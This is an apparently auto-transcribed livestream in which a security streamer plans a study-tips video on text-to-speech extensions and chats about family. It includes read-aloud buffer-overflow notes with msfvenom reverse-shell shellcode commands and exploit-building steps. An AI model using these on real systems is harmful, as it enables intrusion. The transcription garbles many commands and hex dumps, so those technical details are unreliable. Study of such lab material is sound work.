So we have Read Aloud also here. So what else? Do we have another browser in this phone? I mean, you should have Chrome as default, right? Chrome, yeah, it's Chrome. So I have it for TTS, for the TTS for streaming. So how does it work? The menu is up here. We have you saw how easy it was in Firefox. So I'm like, what's that? No. Home. What's home? There's a my face. I'm just scrolling down the where you click on your face thingy. Toolbar shortcuts, accessibility, site setting, languages, downloads, about Chrome. New tab, advanced. Theme, advanced. No, I don't care about theme. I don't use this program. I just want to see how do I add extensions or plugins or whatever you call it, right? So I can do incognito tab. Why would I want to? History, late browsing data, downloads, bookmarks, recent tab, settings. Okay, let's assume it's in settings. So I'm back to that page that I just looked at. I don't see anything. The 3 little dots. There's a star, there's an eye. You're viewing a secure Chrome page, it said. And there's an update. There's nothing. I can't see it. Well, let's just assume that it's not possible, right? But it was very simple here. So you click the menu thingy in the corner, you click extensions. And now when I have it installed, I can just click the little arrow there, and I can click the read aloud.
Python programming language.
And it starts reading.
This article is about the Python programming
So
language.
I'm just stopping it because, you know. So if I wanted to read a wiki while actually having my eyes occupied with something else, that's the main thing here. Multitasking, right? So, we can add. So, actually, I think it's called plugins, but let's just check. So, yeah. So now I'm seeing this video instruction, right? What will be in this video? And we don't need 2 sides because this is just one thing. So I'm kind of skipping the other side. New tab, new window. So this is a little puzzle piece. It's called extensions here too. It's just me calling it plugins. No, it's add-ons. Add-ons. Okay, so extensions is a part of the add-ons then. So here's read aloud. But what if we were to search for read aloud? So I think I found this for my kid. And then I was like, why not put it on mine too, right? I was actually putting it on mine to try and make him use it, as he couldn't read. So if we click this, we get to the page. So let's check the link out, because I'm after the link, right? So I'm assuming if I do this, I'm here still. So I'm putting this in the note here. Firefox extension, I guess. All right, it says available for Firefox on Android. Firefox looks very odd with a uppercase F. I'm like, my God, what did I do? It's 2 words though, right? Firefox. Also for Android. Just added the information. And then the installation process for this, we're going to have to how to install an add-on. Firefox, how to install an add-on, because I'm thinking, what are their suggestions? Menu button, click add-ons and themes. So there was such a thing? Because I looked for it, but I didn't see it. Oh, it's there. I'm just blind. I was looking for plugins, not add-ons and themes. Right. Click the menu button. Click add-ons and themes and select recommendations. Click the blue install. No. So just add-ons, search for read aloud, right? So I'm actually copying a bit of that. Click the menu button, and of course I would never say that. Add-ons and themes. And search for read aloud. And then we have so after having searched, let's close this. So we go to add-on themes, we search for read aloud. Click it. I guess click it is good enough. And oh gosh, I don't want to do that. So let's just click anything else. What's the button called? Add to Firefox. Click the right one. And then just add it to Firefox. And of course I'm going to do that while I record. Oh gosh. Should we do something about the settings? And I'm gonna not just talk about all of them. So I started with Obsidian because it was for Theo, right? That's not the first thing to start about. If someone doesn't know what Obsidian is, you know. So lots of other programs also have text-to-speech features. One example is the note-taking app Obsidian. So let's just start from the start here. So I need to change it totally. To really remember what you just learned, you need to repetition, right? That's boring. Here's the tricks I use to repeat without working. Magic study tips, study without working. Yeah. I don't know if I like that. Also I could use the magic, right? Here's the magic tricks I use. We don't have to have anything more there. And show list of video contents. And it will be TTS. Add on in Firefox. Or Chrome. I can't spell Chrome. What happened? It usually puts the dot there too. I don't know. Or maybe I just clicked twice. No? I wouldn't have done that. I don't know. It was just a magical 1 becoming a 0 or the other way around there, right? So get using TTS. Well, it's too short. Let's put the other one back. Oh, I need a quick break, and I have to go talk to my kid. I'll be right back. So. So, my kid wants some noodles for food. But not really yet. So, let's do the same for Chrome. So Chrome on for my TTS. What's this, by the way? Tag groups. Tab groups. Is that folders? Extensions. So if I click extensions, nothing happens. So menu, extensions, manage extensions. Let's have that up. It will probably disappear as soon as I click, right? Yeah. Menu, extensions, manage extensions. Read, allowed. What? Is that something that's installed? That would be bad. Let's see. I didn't know I ever had installed an extension. Oh, I installed Video Speed Controller here too. Yeah, let's... I don't know what that is. I don't know what that is. So these I like. Read aloud Chrome. So it's a web store I need to go to. So extensions, visit Chrome web store. Read aloud. Why did it mess up? As it's seen here, right? So visit Chrome web store. Visit Chrome web store. And we're all with capitals? Yeah. And then we search. And search for read aloud. So this bit is actually so let's first of all actually hop that. I click the menu button, extensions, visit Chrome Web Store and search for Read Aloud. Click the right one and then add it to Chrome. Add to Chrome. So let's actually do it. Add extension. Click add extension. I guess I'll have to remove it for me. On Firefox. No. I'll have to do it when I
Rubin one
record
says,
anyway.
Are you an ethical, kind hacker by day, an evil, dangerous hacker in a black hoodie by night?
No, I'm always kind. I like helping people. So I'm just helping people. I thought I'd make like some YouTube videos. And since it was a long time I did it, I start with something very simple. And like study tips. So, welcome in. So as in don't use Chrome very often. I just thought I'd do that. This is a TTS. That's the reason only reason I have it installed. So we do lots of things on this channel. We do hardware too. We were just making a library for this the other day. We have rotors we're like messing with, and there's so many things in the drawers here. Here's also like card reader that we're gonna play with. So lots of things. Oh, here we have like some bad USB stuff. So, but I thought I want to not only stream stuff, because it's like 1.5 years since I added anything to my like original YouTube channel. So if we do lifetime on this one. So this is not the one I saw before. Let's just click this thing again. And lifetime. And why is it different? Whatever. It doesn't matter. Maybe I was in advanced mode. Yeah, that's it. So now we can see here. So I started streaming like here somewhere, and then I haven't made any videos. So, and my videos are like short. They're short. And I researched this for my kid, and then I thought, well, I better put it available, make it available for others. So this video is like 156. I want the focused learning. That's the thing I want from videos. This is the live channel. So yeah, let's see if these are finished. So then we can do the upload day 23 of Advent of Cyber. So where in the world are you? Are you like in Europe? Are you somewhere else? I'm thinking time zones. So Yeah, so I did all the Advent of Cyber ones, and I kinda regret it though. But it was nice, but it was also basic, right? But the blue stuff is always good because I need to learn all things. Yeah, I read this great quote yesterday, by the way. Let's find it. Yeah, great quotes. Attack is the secret of defense. Defense is the planning of an attack. So we need both. We need both. So we're currently doing YouTube plans, which is not that very cyber. But the videos will be cyber, right? So far, the only one in the list is a buffer overflow, though. Well, I guess Python series will be cybersecurity too. So we were just, I guess I will have to uninstall Darkreader. Meaning I should check my settings. So, let's just print screen this thing. And let's put it in an image. So, that. But also, shortcut keys. I guess we can have both on the same. So, let's alt print screen that instead. So, because I use these shortcut keys. No, I don't. No, I'm thinking of video speed. Video speed, I use the shortcut keys a lot. I don't use these at all. Maybe I should. Whatever. Let's uninstall it. And when we add it to Firefox, we get the add. So now we know what to add into the video text. Click add. So let's actually click add. So was added. Yeah, I thought so. So now I want to check here. So that's how I had it. That's annoying. Move it to the other screen so I can see both at the same time. So volume, I had it in the middle and somewhere here. So I sometimes started this on stream, that's why I don't have the speed that high that I would have for just me. So
Read Aloud is a Chrome and Firefox extension that uses text-to-speech technology to convert web page text to audio. It works on a variety of websites, including news sites, blogs, fanfiction, publications, textbooks, school, and course materials.
Yeah, school and course materials. That's where we want it, right? Especially while we're doing something else. So I'm gonna go and make some noodles. And let's TTS something. What should we TTS? Let's TTS our buffer overflow notes. Why not, right? Now the thing is that it will not follow along. Also we need it to be the other notes. So unfortunately, I cannot show all of it on screen because it's long. And some of it might read a bit funny too. We'll see how it reads it. So let's while I go and turn on some. We need to first turn on the TTS. As I was doing the web page HTML export to put this on my web page, I didn't want to have the other plugins enabled. This is just another web export test. And this one required a GitHub, so I'm not going to give that access to my GitHub. Then I'll have to make a new GitHub. So, probably not that one. But I'm looking for alternatives. Because if we go to the notes here, we will see that there's like some bugs. Let's go to Linux. This is if you're on a Linux box and wanna like to explore. First of all, it split this into 2 lines, but it's not only there. If you have this kind of list here, sometimes it splits these 2 into different lines. Maybe it's if it's not another line on top or something. So can you do images? Yeah. What could possibly have a list? So most are kind of short. Yeah. We could do this too, but it would read words, right? To TTS this.
Start here, Linux. Start. PWD. LS-law. LS-law * 4 files in. Check
Yeah,
history
you
files
can't do that. So the kind of note that we want to read is this. So now we have the read icon here. So I'm gonna go and just make some noodles. It'll just take a few minutes and I'll be right back and we can continue. And if you want the cybersecurity content, it will be coming probably next stream, right? I just felt I had to get started doing this. Getting some high quality stuff onto YouTube again, because I have only been streaming for 1.5 years, not putting any videos up that are not cutouts of stream or whole streams. So
Bufferoverflow.md. Where to test doing buffer overflow. THM rooms and other exercises. Linux, R2 and GDB. Windows, Immunity Debugger. VMISO. Real-world buffer overflow examples. Altips. Hacking, the art of exploitation book to check out. Toolbafuzz. What is buffer overflow? Buffer overflow is when vulnerable code allows us to write over a bigger section of memory than it should. The C functions gets, strcpy, sprintf, scanf and strcat are examples of functions that doesn't check the available space before writing. Example. We have to do 15 chars though 14 actually overwrites the int variable but with the string terminating null, meaning the value doesn't change and we'd get try again. Low-level program execution assembler. Registers. There are a number of registers, tiny bits of memory inside the processor, with special purposes. The most important ones are the instruction pointer, IP, that keeps track of where in memory we are currently reading and executing instructions. The stack pointer, SP, that keeps track of the memory address of the top of the stack. The base pointer, BP, that keeps track of the memory address of current stack frame start, aka stack base pointer or frame pointer. There are also other registers, for example AX and BX, that have different specific functions in the execution of a program. Also the names of the registers are added to depending on the number of bits the program can handle. More about registers here, /program. Example shellcode. Shellcode that opens a basic shell, source THM, useful if SUID is set. 28 bytes. The shellcode disassembled using R2, commands AAA and then PDF, images /pasted image 202408092042445.png. A string containing the path to /bin/sh plus 0x11, random extra byte, is put in the RCX registry. To get rid of the extra 0x11 RCX is first shifted 1 byte to the left and then to the right. RCX is then pushed onto the stack. Other requirements for the syscall, exec, to execute the path are prepared and then the syscall is made. Generate shellcode. Miss Venom P Linux /x86 /shell reaver sectl host =port =format c arch x86 platform Linux bad chars out. Miss Venom P Linux /x86 shell reaver host equals 127.0.0.1 port equals 31337 format C arch x86 platform Linux bad chars /x00 /x09 /x0a /x20. Miss Venom P Linux /x86 shell reaver host equals 10.10.14.245 port equals 443 format C arch x86 platform Linux bad chars /x00 /x09 /x0a /x20. Shellcode. Number of bytes, 95. Add 16 or more nops when the payload in decoded/unpacked it will take more space. Find the execution start address. The position returned by pattern offset.rb equals 2060. A random number of nops equals 256. The number of bytes in the payload equals 95. 32-bit executable gives a 32-bit address equals 4 bytes. Afterwards we confirm that it's been entered into memory in the format we supplied with Python. We select an address in the middle about nops, 0xFFFFD731, as our start address. Remember the NDNS and reverse the address when adding it to the Python. 0xFFFFCC90. Now our shellcode will hopefully be run. Finding a return instruction. In some cases we want to put the shellcode after the EIP/address so that it will be located the stack pointer position. In this case we can use another method to jump to the shellcode. We can set EIP to point to a JMP ESP, call ESP or push ESP, RET instruction /s in the actual program not to the stack. To find their instructions in the program using x64dbg we can. Logs tab. At module info list all the processes modules. Find the ones with no protection, all false. The program's own files are more likely to be running on another machine, especially the main executable. Symbols tab, Alt+E. Double-click the module name to jump to it in the CPU tab. Ctrl+F to search for an instruction in the module. For example JMP ESP. If we need to search for more than one instruction we use Ctrl+B and enter the hex machine code for the instructions. Can be used to convert instructions to machine code. The searches will hop us to the References tab. Mouse over or double-click for more into.
Well, it didn't read all of it. Didn't read even half, I think. So I'll just put on the water and started doing some other useful stuff like folding a lot of bags while I was listening. Yeah, so we could do this a different way. This is a test now. So we do have the web page. Let's go to buffer overflow here. I don't think I made any changes to buffer overflow. So it should be the same file, meaning we should be able to TDS it, and
buffer overflow.
There's also a skip.
Buffer overflow. Real world buffer overflow.
So we can hop over a bit, right?
We have to do 15 chars. Low level program execution. Assembler. Registers. There are a number of registers, tiny bits of memory inside the processor, with special purposes.
This will read all of it. I know this is not buggy.
That keeps track of where in memory we are currently reading and executing instructions. 2. The stack pointer, SP, that keeps track of the memory address of the top of the stack. 3. The base pointer, BP, that keeps track of the memory address of current stack frame start, aka
so this
stack
was
base
better
pointer or frame pointer.
Along.
There are also other registers, for example AX and BX, that have different specific functions in the execution of a program. Also the names of the registers are added to depending on the number of bits the program can handle. Memory layout. When a program is executed, two main areas of the computer's memory are used, the stack and the heap. The heap is mostly used to dynamically assign memory. The stack. A thing you need to remember about the stack is that it grows downwards. This means that for example when space for a new variable is declared the address of this will be lower than the last one declared. The stack is mainly used for saving smaller amounts of data. The most important being the next instruction to run and other registers after a function is called local variables. The assembler instructions push and pop can be used to quickly add / remove something to / from the stack, like a plate on a stack of plates, the reason for the name stack. What push and pop actually does. Push value. Sub ESP, for decrease the stack pointer by the size of the data, 4 bytes. MOV ESP, value store the value at the address now pointed to by ESP. Pop destination. MOV destination, ESP load the value at ESP into the destination. Add ESP, for increase the stack pointer by the size of the data, 4 bytes. Stack frames. For every function that is run a new bit of the stack is used. The old top of the stack, ESP, will now be the base of the new stack frame, EP. The stack frame will contain 1. The old instruction pointer, EIP. 2. The old base pointer, EP. 3. Other registers saved by the code, compiler/programmer. 4. Local variables. The new top of the stack, ESP, will be the stack frame's top. As you can see in the images, a buffer is addressed from the bottom as the stack is growing to lower memory addresses. And when we put too much data into the buffer and get a buffer overflow, it will overwrite what was previously put on the stack. First other variables, then other saved registers, and then the saved base pointer, EP, and instruction pointer, EIP. When we later leave the function, this will all reverse. The saved base pointer and instruction pointer are read back into the registers. We will get a segmentation fault if they don't contain usable values. We need to get the right values into the right places. Program flow in assembler. Call a function. Call does. Push EIP saves the old instruction pointer to the stack. JMP function sets the instruction pointer to the function's memory address. At the start of a function starts with push EP save the old base pointer to the stack. MOV EP, ESP copies the old stack pointer as a new base pointer. Push EPs push possible regs that will be used in the function. Sub ESP, 0x404 makes space for the function's variables. On the stack, in this case a char buffer of 1024 characters. At the end of a function end with leave equals MOV ESP, EP save the old base pointer as a new stack pointer. Pop EP get the old base pointer from the stack. RET equals pop EIP get the old instruction pointer from the stack. Meaning leave and RET are really shorthand for these. Exploring memory, stack and heap. When we find a buffer overflow vulnerability, we need more information. We can use different tools to explore memory and to debug and step through program execution. Hopefully we can run the program in a debugger or attach to a process with a GUI debugger like EDB, Linux, or Immunity Debugger, Windows. There are lots of tools available to debug and explore applications in different ways. For Linux we have, for example, R2, RaiderA2, GDB, LLDB, ObjdumP, readelf and EDB, Graphical. For Windows there are WinDBG, OllyDBG, Immunity Debugger, IDA. A modern choice is X64DBG, and X32DBG. The simplest for basic info might be ObjdumP. ObjdumP deprogram disassemble program to get function address. More complex with almost infinite possibilities tools like RGDB and R2. GDB, info functions. 0x0004000527 copy _arg. 0x0004000564 main. GDB, info registers. RAX 0x40056441956884. RBX 0x00. RBP 0x7FFFE3B 00x7FFFE3B0. RSP 0x7FFFE3B0 0x7FFFE3B0. RIP 0x400568 main plus 4. GDB, disassemble main. Dump of assembler code for function main. 0x00011D2 plus 0, LEX ESP plus 0x4. 0x00011D6 plus 4, and ESP 0xFFF0. 0x00011D9 plus 7, push dword PTRX 0x4. 0x00011DC plus 10, push EP. 0x00011DD plus 11, MOV EP ESP. GDB, x/40x$SP. 0x7FFFDD30, 0x0000x00000xF7 phase 6C40 0x0007FFF. 0x7FFFDD40, 0x0000x00000xF7 FDAB 00x0007FFF. 0x7FFFDD50, 0x0001 0x0000xF7 Takeda 0x0007FFF. 0x7FFFDD60, 0xFFFDE50 0x0007FFF 0x555159 0x000555. 0x7FFF7DD9F0AFL. 0x00400527161161 sim.copy _arg. 0x004005645151 main. 0x00400552BDR. RAX equals 0x7FFFE623. RBX equals 0x000. RSP equals 0x7FFFE2D0. RBP equals 0x7FFFE2D0. RIP equals 0x00400552B. 0x7FFF7DD9F0 PDF at main. 51, int main, int ARGC, char ARGV, char enp. 0x0040056455 push RBP. 0x00400565 4889 times 10 to the power of 5th MOV RBP, RSP. 0x004005684883 EC.
I kind of like it reading the numbers, but it's not like I'm
understanding
all the numbers.
MOV word bar _4H, EDI,
Wow.
ARGC. 0x00400565F4889750
It's kind of fun. Long ago. Yeah, we need to add driving to the list. So, let's pull this one back here. So driving. That's the wrong one. This is the one I want back here. I have lasagna, and my tummy hurts a bit, so I really felt like I needed to eat now too. Get. Let's just type at voice here for now. I'm adding podcasts too. I don't know if I. As this was for Theo, it's not like he's a noob. It's just the TTS tips on that. So I'll add other stuff now. I mean, he knows about podcasts. I guess everybody does, but still. Let's add in your area on your subject, right? Do you have anything else that have TTS that I know of, and even if I haven't used it? Well, obviously I haven't used the plugin to OBS a lot because it didn't work, and I didn't know. So it was a bit odd though. I thought it would work, and I think I've tested it, but it did read. It just didn't read all of the files. It might also have been some character that it couldn't do. That it got stopped by some odd characters. Not very hot. Yeah, this is also a good way to test if this is good, right? We could do this.
Study tips. Study without working.
While I eat.
Study tips. Also make a short, smiley face, short. To really remember what you just learned you need repetition, right? But that's boring. Here's the magic tricks I use. Show list of video contents. TTS add-in in Firefox. Chrome. Add voice. Podcasts on your subject. Image of how learning works. I usually just listen to stuff as repetition while I do other things, like hanging the laundry, making dinner, or even repetitive, not that brain intensive, work on the computer. It's also perfect to listen while taking a jog or walk or even working. You can listen to long articles on, for example, Try Hack Me Rooms by installing a TTS plugin in your browser. I use Read Aloud on Firefox. Show it. Click the menu button, add-ons, and themes and search for Read Aloud. Click the right one and then just add it to Firefox. Click Add. Chrome. Click the menu button, Extensions, visit Chrome Web Store, and search for Read Aloud. Click the right one and then just add it to Chrome. Click Add Extension. You can listen to any text file, PDF or EPUB by installing the FAT Voice Aloud Reader on your phone. Show it. Lots of other programs also have text-to-speech features. One example is the note-taking app Obsidian. You can listen to your notes in Obsidian by installing the plugin Text-to-Speech. Show it. You can among other things set the speed of the TTS and set a sleep timeout so you can listen to a book while falling asleep. And suddenly all PDF files are free audiobooks. Smiley face. EPUBs work the best though. I'm sure there's a similar app for iPhone. To get reading materials, you can put any text into a text file or print to PDF. For example, Try Hack Me Rooms, Wiki articles, Google Docs. Lots of free books, articles, manuals, standards, and so on are available for free in PDF format. There is something called LibGen that a person with an empty wallet can Google. Description. At Voice Aloud Reader. Firefox, also for Android.
So, I'm doing this. I'm thinking we want to record. If we want to record this,
Senor
right?
Gima says.
What are you doing today?
So I'm getting started making better videos again. So, for the last 1.5 years, I have only streamed. And I have, like, to YouTube, I have, like, uploaded the full streams. And now I uploaded cut bits of, from the streams of the Advent of Cyber. And that's so horrible quality, so I got a bit like, oh my god. Also, my normal channel has... I closed the tab. Let's reopen the tabs. So I will almost have 1,000 subscribers on the channel I have not done anything on. And people still watch the old videos here, but still, I'd like to, you know, make new ones. These are also stuff I researched for my kids. Well, there's also this, but I'm gonna put the Python course I'm making there. I'm gonna put, like the first one, I took a simple one, a simple subject, and the first video will be like my medical study tips to study without having to work a lot. Like you can listen while you're driving and use TTS on web pages and listen
I'm going to be switching
PDF
over
files.
my Ubuntu server to Promox and make individual VM and other stuff.
Oh, okay, cool. Yeah, so I've been thinking about the server too, because if I didn't have my VM locally running... Oh, actually, when I start 2 VMs, my stream might crash. So I have that need to. Yeah. But I think I'll be getting a new computer, or parts. I have a box, it's just that the motherboard of that one died. And it's sad because it's a good one. So... but I think it must have been like heat or like maybe static electricity. Something like that just killed it. Which is sad. But anyway, this is like the tips. You can read aloud in your browser. You can just missing host permissions. Well, I just uninstalled it and reinstalled it. It's probably a bit odd for a bit. Let's do
channel content.
There, that's what it's supposed to be.
January 8,
so
2025.
it does this as a private tab.
Yay, and I want to be able to have a VM with Vazuzine and another Windows VM
Just
and learn how to audit and harden it as well.
Okay. So CM and other Windows VM. Yeah, exactly. To be able to run several things that you have on all the time. You don't want to use your PC for that. So definitely great ideas. Inspiration. Yeah, let's actually look at I've heard of it. So I think I had been there, that's why it found the URL right.com. I don't extremely mind the graphics, but I prefer numbers, really. But I guess it's easy to see. So do you have any specific plans for other stuff you're going to do? And what machine are you installing on? I'm sorry, I definitely got a cold. I was outside yesterday. It was cold outside. It was 5 minus, a bit more even, 7 minus, I think. I'm. It's inside here. It's 26.3. I'm good now. I have to go outside soon in 0.7. Oh, it's actually plus outside today though. Though it's snow still. So I don't like when it hops up too much, right? You have to try and find out what
not at all. I'm just like all over the place and trying to learn different things.
Great.
I built a PC from spare parts I had laying around.
Oh yeah, great. Yeah, so I should do a PC build stream. Because I also have a lot of parts and like old computers in this room taking space that I've been planning to do for some time, and I haven't. So I actually think there's another computer in here that could possibly work as a server. And I know I have 32 gigs of RAM that I was hoping I could put in this computer, but it can't handle. There's no more slots, right? That's the problem. So it only has 32 gigs for now. So I should eat because I'm driving my kid to school soon. Let's see, that one's 1 hour off. I should fix that. It says 13:02. We would have been 15 minutes late. So we're going like 12:40 probably. Like starting to prepare to leave. We need to drive at 13. And I might have to, like, the tires might be flat. So my winter tires, they're slowly losing some air. There's so much I want to test. Yeah, but I want to also not only focus on streaming. I want to do this too. Can I scroll? So I couldn't scroll when I was over there. Also, it looked very funny, but it said no. Can I click here? Yeah, it goes to the channel, and then I can go back to.
Are we going red team or blue? Or a little bit of both?
So, I just read this quote that I found yesterday, which was kind of cool. Attack is the secret of defense. Defense is the planning of an attack, right? We have to listen to Sun Tzu. Now, so you need to know everything, and this was a good way of describing it. So I keep saying that we can't just do. So even if I want to do red team, that might be what I do. We'll see. I'm still like, I want to know all the things, and especially you need to know it for your own home too, to be able to defend everything. Yeah, I just think you need to know all. What about you? You going in red team or blue? Or a little both?
I feel like red team gets glorified too much. It's like blue needs some love to lol.
Yeah. So I've been doing these anti-siphon trainings. So that's a tip if you're not already checking them out. Well, so some things that are blue team, they really, also other stuff I've looked at. So I've been like an IT admin for a long time, IT specialist, and making script, optimizing things to be efficient. Like, it kind of connects to that side of me that wants to make scripts and make things perfect. Like, then you could detect things, and yeah. So I'm interested in that too. Though making cool tools for getting into computers kind of sounds even more fun. But it's the making part that I like, right?
I just started my help desk position. I wish and hope to get where you are now.
So, but I'm applying for jobs. You have a job. So it was some time. I've been home with my kids with special needs. So I'm like out of touch a bit with some parts of it, at least. I do some work here, but I have my own company and do some consulting, but it's not exactly what I want to do. It's more like I work at a company that's close by, so I can be close to the kids, but still
What
practice.
Kind of special needs, if you don't mind me asking?
No, it's autism, and my other kid is ADHD. So, and they've been home from school for like forever. So one of my kids was from like the first grade, and the other from the second.
I have a little brother with autism, and he lives with me.
Oh, cool. Yeah, so that's been limiting a lot what I can do. So I still have to help. He just became 17, my oldest, with autism. So he needs some help with like basic stuff like food and things. So. But it's not that he can't do it, it's mostly that he doesn't feel his hands are clean enough to do it. So we're working on it.
I'm trying to teach him how to become an adult.
How old is he? So...
He is 22.
Yeah, so it's like a tough age there when they're like adult, but maybe there's something that they don't know how to do that you're like supposed to, that other people might think is very, very simple and it's just like impossible or hard or not interesting enough to be interesting enough to do. Yeah. So my 70-year-old, he says like, it's not worth it. Like, yeah, so let's go and get some glasses for you because your eyes are bad. We have to go that, we have to do that. It's not worth it. I can see, and it's just like this. You know? I'm like, yeah, now we have to do it. So that's one of the plans. So he should have had glasses since he was much younger, really. Like the other day he looked at me and then he did this on the screen and he looked at me again. Like, okay, I know I need those glasses. Yeah, then there's a lot of things you can do nowadays. Like, if for example someone thinks it's hard to go shopping food, they can just order food. So I order food for my mom, which is very nice, so I can just, it's sent home to her. I don't have to go shopping and drive it to her. I would have had to like 20 years back, right? It all happened during COVID that we got more remote friendly for everything. I think it's good for people with autism extra, because then some things in the world are more like available.
Has the same way. He doesn't know how to spit out phlegm and he thinks medicine will make it go away. I understand what you mean.
Yeah, yeah. So it could be like anything that... yeah. So I'm hoping too that my kids will find things they love to do and like they can work with in the future. So that's the hope. Though both my 14-year-old just learned to read like a year ago maybe now. So he's probably got a lot of dyslexia, but he was too burnt out to even do that investigation thingy to get the diagnosis.
Or teaching him how to cook, he just tell me why. I can just buy food.
Yeah, exactly, that thing. Yeah, or you can just give me food, maybe. Or also when it's learning about things. Like he's interested in Five Nights at Freddy's, Minecraft, what's it called? Backrooms, and he reads a lot of wikis and he does a lot of stuff. He's also interested in like programming and things, but he's never ever in his life learned how to study stuff and how to like work to reach a goal. Though he does a lot of planning, he makes like a lot of like also words, though he puts it mostly in images. He does text files now too, but yeah, and he's good with graphics too. So I'm like thinking, what could he do? As he's not done any school really. He's taught himself all that he knows, except for what I've taught him, you know. But you can't just start talking about something and say, no, we need to learn about this subject. That doesn't work. If it's not interesting, he won't even hear that I'm talking. So, yeah.
Same.
Yeah. Yeah, so you're a very nice brother. As a mom, it's not like I have any choice. How to... But I guess it's the same whatever family you are.
I'll tell him about something, but then he'll go on about Call of Duty lol.
Yeah, I get it. So I hope that my kid will at least start playing online with other people, because he doesn't have much social interaction even online, so that would be nice. I think your brother has that, right? So anyway, my kids
he
started
likes to play solo ride.
He does that too. Okay, yeah, maybe they're similar. It sounds like that. So, any interests that you could possibly... Maybe he wants to be a game developer then.
Yeah, every time I want to play zombies with him, he says no, I'm okay, lol.
Oh, okay, yeah. So I play with him sometimes. We played Minecraft the other year. His birthday was the 10th, so it's just 17 in a few days. But still, it's closing up to 18 when he will become adult. So it feels a bit right. We have to do some things, like getting him an electronic identification and things, so he can do stuff himself. Some things, or we help him, of course. Yeah. So I don't know how it is if he feels. He said before that he wants friends, but I don't know now how he feels about that. It's like a hard subject to talk about if they don't have any friends. It's like depressing too for them to think about that they don't and they want it, and maybe they'll just find like, oh, I prefer doing it myself. I don't know. Maybe other people are not as flexible as they want it. They'll do what they want them to do, and then it's better doing it yourself still. I'll have to finish my food.
Yeah, my mother was scared that he wasn't going to have a normal life, but I remind her it's okay, nobody has a normal life, and has already done so many things as in life with me and get a job and almost be independent.
Mm-hmm. Oh, cool. So he has a job now? It's just other stuff that's tougher? The normal thing was great, by the way. No one has a normal life. Yeah. So my hubby's so worried all the time about the kids. And I'm like, yeah, so in Sweden we can study whatever age we are. They can catch up whenever they're, like, mature enough, right? And it's not like they will... Their things will work out somehow in the end, I'm sure. They're smart. So... But he's more like panicking constantly about it. Yeah.
Yay, it's hard for him to keep a conversation going and also remember things.
Yeah, that makes it hard to, like, communicate with the job and stuff, of course. We'll have to get, like, systems for taking notes and find ways to communicate. My kid has actually, he's had meetings with, like, psychiatry people and stuff on Discord. So as he's comfortable with Discord, they're the one that can be flexible, so they will have to be flexible, right? So I think he did a meeting on another thing now, so it's getting better. So I feel bad about eating on stream. Especially getting drool over my face. So there's a lot of other cool quotes from Sun Tzu, of course, that are very cybersecurity friendly.
He also has the biggest heart. Every time he's at work, he works at a supermarket. He asks us if we want anything, LOL.
Oh, that's nice. That's nice. Yeah. And that's quite a social job too, right? Supermarket.
Or he tell us, please text me whatever you want and has broke lol.
Yeah. That's so nice. Yeah. So, I know that some autistic people don't like hugs and stuff. I don't know how many times we hug every day, my 17-year-old. So I don't think a lot of 17-year-olds hug their parents very much. So I guess there are lots of, pups too. And it's, you need human connection by touch sometimes. So that's a great thing too. Let's see, where were I really? Over here, right? Let's close this. So before we have to stop and, like, max 10 minutes. So this was a short list of the videos that we made here. So any other things? The only cybersecurity things, I guess the Python is a bit cybersecurity. This is, of course.
Yeah, I ask him for hugs randomly, or I call him and he comes over and I call him Stinky Lul.
Oh, yeah. Yeah, but I'm thinking, so if he's not, playing games with others, at least at his work, he meets lots of other people, right? So maybe he's got enough on his social meter, not to feel he needs to play games on his private time with other people. So my 17-year-old is just home, except for when I managed to get him to the store or something. Which has been much better. He's since COVID, he's been twice a year outside the house and stuff like that. But now he's been out, I don't know how many times. So that's great, especially since summer. It's been much better. So yeah. Let's see here. So I guess this one is first, though it's more complex than the video speed. I could just make a mega short one about the video speed. But we're already building this one. Oh, whatever. They can stay in that order, and then we'll just make some more notes on this. So when I read this, I'll record it. This is like a script. I will change stuff anyway, which doesn't sound, something might sound bad, all the things. So, to really remember what you just learned, you need repetition, right? But that's boring. That's the theme of the video. And then we have TTS, and I don't know if it's called add-on in Chrome. Call it extensions. Extensions. If we visit the web store again. So, extensions and themes. Yeah, it's definitely extensions. So if we do read aloud, and then we find it here. It says extension here too. And so who's not rated in a file? I guess it's good. So what I'm curious about now is, will this keep working if they change stuff in Chrome? This is part of why we're doing this first too, right? So it at least works when we make the video. So let's get the structure down, because I don't have time to finish this in 5 minutes. So first, about the TTS add-on, I guess we do extension for both, as it is for Firefox, and then we do the same for Chrome and Android app. Then I don't have an iPhone, so I can't talk about those, but I guess it's definitely apps like that, right? This is a great one that I found by mistake. Let's do application B there. So what else? And yeah, so we don't need this, or do we? So, as we have new tools, as Obsidian, we can now search for learning, repetition, image. Like research. So I did say image. Well, let's skip that one. I want something that's not like copyrighty. Just boring science image. Natural forgetting. Yeah, I could just throw something like that up. Let's do... where's the settings? Have they changed stuff so much? What's saved? That's not a favorite image of mine. Let's say that. Web. So if we go back and we go to all again. So I want to see tools. What's tools? Ah. So we want to not have anything that's not free. Free to use, share, or modify. I don't know which one's the best. So will it now show different things? So, what did it search for now? Let's look at this. The forgetting card. So, first repetition, second repetition, third repetition, fourth repetition, fifth repetition. It's not like I'm sciencey like that. It's just, I just want a general thingy. Like that. We can make our own flowy image like that. This one is not as clear, though it looks prettier. Chance of remembering. Knowledge level. This is really not pretty. T instead of time. Now I'm curious where this is from. Wherefore you're human. Oh, I'm human. Oh? Yeah. Accept that. Exploring the art of vocabulary learning strategies. A closer look at Japanese university studies. So, it's of course harder to remember detached things as just learning words, right? It's much harder to remember than a connected thing like cybersecurity, general information. If it's not like words, abbreviations, stuff like that. So So we don't need anything nice. I can just like make my own version of this and not give a source, you know? It's just for the video. So let's we can make something prettier than this. Maybe it stretched it. Maybe that's a stupid size. Let's give it 100%. So this is the size. I'm thinking it is an okay size for my screen size. Knowledge level. And I will just make it our own. And it's time for me to go, so I won't have time to do it now, but I'll just make it a little like prettier like that, you know. Move some colors, and this won't be the top, right? It's not symmetrical or nice aesthetically at all. So let's just add a few pixels to the top. So 710 maybe. That's too little. I'm checking if anyone's online. Meanwhile, it's loading Twitch. So, let's see. Not a lot of people online, but I know how to rate exactly. Oh, I guess I better click it. We're rating JD, and that's so funny there. So let's just fill this. Well, this one up here. Oh, it's not actually white. So, where's the dropper thing? There. So, I'll probably change it a lot more. It doesn't feel good to me. I'll move it when I've changed it. So let's put something not so correct and sciencey looking from the other images, right? So I'm just gonna hop back to this page generally. Oh, what's this? You even have an up here too. Repetitions. So it's staying. It still will go down, right? I'm curious about the angles there. Help enterprise work. Yeah.
Name here.
Oh God.
Thank you for the raid. How did insert last activity here go? Now, let's
Wow.
rock.
